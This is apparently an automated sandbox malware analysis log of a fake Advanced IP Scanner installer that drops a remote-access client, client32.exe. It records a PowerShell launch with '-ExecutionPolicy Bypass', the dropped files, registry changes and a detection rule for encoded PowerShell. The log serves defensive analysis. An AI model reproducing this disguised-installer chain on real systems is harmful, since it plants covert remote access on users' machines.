                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: String function: 1105D340 appears 492 times
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: String function: 1109CBD0 appears 32 times
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: String function: 1105D470 appears 41 times
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: String function: 11027550 appears 94 times
                                  Source: KC0uZWwr8p.exeStatic PE information: invalid certificate
Source: KC0uZWwr8p.tmp.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: is-LEVQP.tmp.1.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: KC0uZWwr8p.tmp.0.dr | Static PE information: Number of sections : 11 > 10
Source: is-LEVQP.tmp.1.dr | Static PE information: Number of sections : 11 > 10
Source: KC0uZWwr8p.exe | Static PE information: Number of sections : 11 > 10
Source: is-QDVS6.tmp.1.dr | Static PE information: No import functions for PE file found
Source: is-5URF2.tmp.1.dr | Static PE information: No import functions for PE file found
Source: is-U7801.tmp.1.dr | Static PE information: No import functions for PE file found
Source: is-012CR.tmp.1.dr | Static PE information: No import functions for PE file found
Source: is-JOPC8.tmp.1.dr | Static PE information: No import functions for PE file found
Source: is-V3C3T.tmp.1.dr | Static PE information: No import functions for PE file found
Source: is-56HU1.tmp.1.dr | Static PE information: No import functions for PE file found
Source: is-5C3J6.tmp.1.dr | Static PE information: No import functions for PE file found
Source: is-14FKM.tmp.1.dr | Static PE information: No import functions for PE file found
Source: is-IVQT8.tmp.1.dr | Static PE information: No import functions for PE file found
Source: is-5BNS6.tmp.1.dr | Static PE information: No import functions for PE file found
Source: is-P2PON.tmp.1.dr | Static PE information: No import functions for PE file found
Source: is-TE3AT.tmp.1.dr | Static PE information: No import functions for PE file found
Source: is-MB1RQ.tmp.1.dr | Static PE information: No import functions for PE file found
Source: is-RT7U6.tmp.1.dr | Static PE information: No import functions for PE file found
Source: is-ET1Q4.tmp.1.dr | Static PE information: No import functions for PE file found
Source: is-I1VEE.tmp.1.dr | Static PE information: No import functions for PE file found
Source: is-IK3SG.tmp.1.dr | Static PE information: No import functions for PE file found
Source: is-AQQBN.tmp.1.dr | Static PE information: No import functions for PE file found
Source: is-QAKOH.tmp.1.dr | Static PE information: No import functions for PE file found
Source: is-5KHP2.tmp.1.dr | Static PE information: No import functions for PE file found
Source: is-FLT6F.tmp.1.dr | Static PE information: No import functions for PE file found
Source: is-593G3.tmp.1.dr | Static PE information: No import functions for PE file found
Source: is-NB2QQ.tmp.1.dr | Static PE information: No import functions for PE file found
Source: is-MR0EO.tmp.1.dr | Static PE information: No import functions for PE file found
Source: is-495HA.tmp.1.dr | Static PE information: No import functions for PE file found
Source: is-DLE8L.tmp.1.dr | Static PE information: No import functions for PE file found
Source: is-5JUJC.tmp.1.dr | Static PE information: No import functions for PE file found
Source: is-FNUE4.tmp.1.dr | Static PE information: No import functions for PE file found
Source: is-2QTH6.tmp.1.dr | Static PE information: No import functions for PE file found
Source: is-6H7V6.tmp.1.dr | Static PE information: No import functions for PE file found
Source: is-4U5GH.tmp.1.dr | Static PE information: No import functions for PE file found
Source: is-UCVS8.tmp.1.dr | Static PE information: No import functions for PE file found
Source: is-QVRL0.tmp.1.dr | Static PE information: No import functions for PE file found
Source: is-2QS06.tmp.1.dr | Static PE information: No import functions for PE file found
Source: is-A7U9L.tmp.1.dr | Static PE information: No import functions for PE file found
Source: is-V71S3.tmp.1.dr | Static PE information: No import functions for PE file found
Source: is-HA61E.tmp.1.dr | Static PE information: No import functions for PE file found
Source: is-9GMK5.tmp.1.dr | Static PE information: No import functions for PE file found
Source: is-L4L9S.tmp.1.dr | Static PE information: No import functions for PE file found
Source: KC0uZWwr8p.exe, 00000000.00000000.1642880189.00000000006E9000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFileName vs KC0uZWwr8p.exe
Source: KC0uZWwr8p.exe, 00000000.00000003.1647342710.0000000002C0F000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFileName vs KC0uZWwr8p.exe
Source: KC0uZWwr8p.exe, 00000000.00000003.1648007586.000000007EE1B000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFileName vs KC0uZWwr8p.exe
Source: KC0uZWwr8p.exe | Binary or memory string: OriginalFileName vs KC0uZWwr8p.exe
Source: KC0uZWwr8p.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: amsi32_5448.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 5448, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine | Classification label: mal60.rans.spre.troj.evad.winEXE@10/299@3/3
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Code function: 7_2_11059270 GetLastError,FormatMessageA,LocalFree,7_2_11059270
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Code function: 7_2_1109C750 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,7_2_1109C750
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Code function: 7_2_1109C7E0 AdjustTokenPrivileges,CloseHandle,7_2_1109C7E0
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Code function: 8_2_1109C750 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,8_2_1109C750
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Code function: 8_2_1109C7E0 AdjustTokenPrivileges,CloseHandle,8_2_1109C7E0
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Code function: 7_2_11095C90 GetTickCount,CoInitialize,CLSIDFromProgID,CoCreateInstance,CoUninitialize,7_2_11095C90
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Code function: 7_2_11088290 FindResourceA,LoadResource,LockResource,7_2_11088290
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | File created: C:\Program Files (x86)\Advanced IP Scanner
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\installPackage.zip
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2588:120:WilError_03
Source: C:\Users\user\Desktop\KC0uZWwr8p.exe | File created: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp
Source: C:\Users\user\Desktop\KC0uZWwr8p.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\KC0uZWwr8p.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | File read: C:\Program Files (x86)\desktop.ini
Source: C:\Users\user\Desktop\KC0uZWwr8p.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
Source: KC0uZWwr8p.exe | ReversingLabs: Detection: 18%
Source: KC0uZWwr8p.exe | String found in binary or memory: /LOADINF="filename"
Source: C:\Users\user\Desktop\KC0uZWwr8p.exe | File read: C:\Users\user\Desktop\KC0uZWwr8p.exe
Source: unknown | Process created: C:\Users\user\Desktop\KC0uZWwr8p.exe "C:\Users\user\Desktop\KC0uZWwr8p.exe"
Source: C:\Users\user\Desktop\KC0uZWwr8p.exe | Process created: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp "C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp" /SL5="$20430,18032967,815616,C:\Users\user\Desktop\KC0uZWwr8p.exe"
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-AG44P.tmp\ExtractedContent.ps1"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe "C:\Users\user\AppData\Roaming\SystemUtil\client32.exe"
Source: unknown | Process created: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe "C:\Users\user\AppData\Roaming\SystemUtil\client32.exe"
Source: unknown | Process created: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe "C:\Users\user\AppData\Roaming\SystemUtil\client32.exe"
Source: C:\Users\user\Desktop\KC0uZWwr8p.exe | Process created: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp "C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp" /SL5="$20430,18032967,815616,C:\Users\user\Desktop\KC0uZWwr8p.exe"
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-AG44P.tmp\ExtractedContent.ps1"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe "C:\Users\user\AppData\Roaming\SystemUtil\client32.exe"
Source: C:\Users\user\Desktop\KC0uZWwr8p.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\KC0uZWwr8p.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Section loaded: linkinfo.dll
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Section loaded: ntshrui.dll
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Section loaded: cscapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kdscli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Section loaded: pcicl32.dll
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Section loaded: pcichek.dll
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Section loaded: pcicapi.dll
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Section loaded: samcli.dll
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Section loaded: dbgcore.dll
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Section loaded: nsmtrace.dll
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Section loaded: nslsp.dll
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Section loaded: devobj.dll
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Section loaded: pcihooks.dll
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Section loaded: winsta.dll
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Section loaded: riched32.dll
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Section loaded: riched20.dll
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Section loaded: usp10.dll
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Section loaded: msls31.dll
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Section loaded: pciinv.dll
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Section loaded: firewallapi.dll
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Section loaded: fwbase.dll
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Section loaded: fwpolicyiomgr.dll
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Section loaded: pcicl32.dll
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Section loaded: pcichek.dll
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Section loaded: pcicapi.dll
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Section loaded: samcli.dll
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Section loaded: nsmtrace.dll
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Section loaded: nslsp.dll
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: devobj.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
Source: Advanced IP Scanner for Windows.lnk.1.dr | LNK file: ..\..\..\..\..\..\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File written: C:\Users\user\AppData\Roaming\SystemUtil\nsm_vpro.ini
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Window found: window name: TSelectLanguageForm
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Automated click: Next
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Automated click: Next
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Automated click: Next
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Automated click: Install
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Automated click: Next
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Automated click: Next
